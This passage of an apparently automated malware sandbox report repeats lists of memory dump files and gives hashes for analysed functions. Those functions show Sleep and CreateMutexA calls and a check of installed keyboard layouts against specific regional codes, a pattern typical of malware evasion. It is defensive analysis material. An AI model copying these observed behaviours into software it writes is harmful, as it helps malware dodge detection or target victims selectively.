Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 65a6b2d25e72e31695af196a7cb26900cd07a87c1e07f84e6651011156ec613d
Instruction ID: 2b5163e3d683af51a92dc4754ea74314263613936bab3d0e88d6b1c8bec65a5b
Opcode Fuzzy Hash: 65a6b2d25e72e31695af196a7cb26900cd07a87c1e07f84e6651011156ec613d
Instruction Fuzzy Hash: E6E08C31041248AFDF267F28CC18E9C3FA9EB91649F008810FD595622ACB7AEA91C680

Function 049E0801 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

1bW, xrefs: 049E08AD

Memory Dump Source

Source File: 00000000.00000002.1708550965.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_49e0000_file.jbxd

Similarity

API ID:
String ID: 1bW
API String ID: 0-2888975267
Opcode ID: b5953a2fb3bf11b31ce6b9933a17fb0992b6a279cefd85f563ca2e622206a3ac
Instruction ID: 004d0a3624d70633fb21377c8390d4bddd4bb045b13472cf5430e6a643a6d30c
Opcode Fuzzy Hash: b5953a2fb3bf11b31ce6b9933a17fb0992b6a279cefd85f563ca2e622206a3ac
Instruction Fuzzy Hash: 6611B2EB24C135BE718384836B109B62B6FE5D73303308836F90BD6102F2C61E4A31B1

Function 00FE5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0000043f, xrefs: 00FE612B
00000422, xrefs: 00FE60C9
00000419, xrefs: 00FE6098
Keyboard Layout\Preload, xrefs: 00FE6054
00000423, xrefs: 00FE60FA

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: e4cba5cf9cc7245ba7f9cd6d3514852a17e156f9fce02058db5863d180d29658
Instruction ID: 434312d9cd0aa88698cfb8da01441dfe0f203abed6ab4e9bbc1a4ec91efc0e76
Opcode Fuzzy Hash: e4cba5cf9cc7245ba7f9cd6d3514852a17e156f9fce02058db5863d180d29658
Instruction Fuzzy Hash: 6CF1E270A0025C9BEB24DF54CC84BEEBBB9EF44704F5042A9F508E7281DB759A84CF95

Function 00FE9BA5 Relevance: 3.1, APIs: 2, Instructions: 140
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 30bb4a49159c4506908489eb774f1b19420c6ae87ad39cee340ffb75c3cf139f
Instruction ID: e6fa4f6cead20e40ab51f8f1d0153521f419af2c0ae78b188c375c3b2ecb5075
Opcode Fuzzy Hash: 30bb4a49159c4506908489eb774f1b19420c6ae87ad39cee340ffb75c3cf139f
Instruction Fuzzy Hash: 5531AD71A042449BEB18EB7DDDC976DBB62EFC5310F308218E004DB3D6D7B959809721

Function 00FE9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706894232.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706931416.0000000001233000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706959170.000000000123A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706978134.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706995875.000000000124E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707010409.0000000001250000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707024490.0000000001251000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707039498.0000000001253000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707054180.0000000001254000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707068747.000000000125A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707082785.0000000001262000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707095387.0000000001263000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707109499.0000000001264000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707125698.000000000126C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707171079.000000000126D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707191466.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707261098.000000000127A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707280857.000000000127C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707410964.0000000001283000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.0000000001285000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707457033.00000000012B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707502207.00000000012E2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707519549.00000000012E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707535942.00000000012E4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707552089.00000000012E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707567838.00000000012EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707585335.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707601240.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3f3bf12cf5b0fcf5fd02d94c71486f9af6eb2e1c340cc3b146d5e469d4c1e5a8
Instruction ID: ac67170817754c175671e7f5b3f3daf5fe617101f9d241f3ec6454ecd4e68ed6
Opcode Fuzzy Hash: 3f3bf12cf5b0fcf5fd02d94c71486f9af6eb2e1c340cc3b146d5e469d4c1e5a8
Instruction Fuzzy Hash: 4A319C31B041849BEB18EB79DCC87ACB762FFC5310F208619E014DB3D6D77AA9809762

Function 00FEA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00FEA963
CreateMutexA.KERNEL32(00000000,00000000,01043254), ref: 00FEA981

Memory Dump Source

Source File: 00000000.00000002.1705746690.0000000000FE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.1705637358.0000000000FE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705746690.0000000001042000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705918787.0000000001049000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705933426.000000000104B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706016627.0000000001055000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706089066.0000000001056000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706181798.0000000001057000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706443020.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706461134.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706495494.00000000011C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706514971.00000000011C5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011C7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706533858.00000000011D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706588060.00000000011D5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706606312.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706625324.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706640637.00000000011D9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706670589.00000000011E5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706685507.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706703177.00000000011E7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706721497.00000000011EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706739196.00000000011FA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706784385.00000000011FB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706800846.0000000001201000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706820388.0000000001212000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706853602.0000000001226000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706875166.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
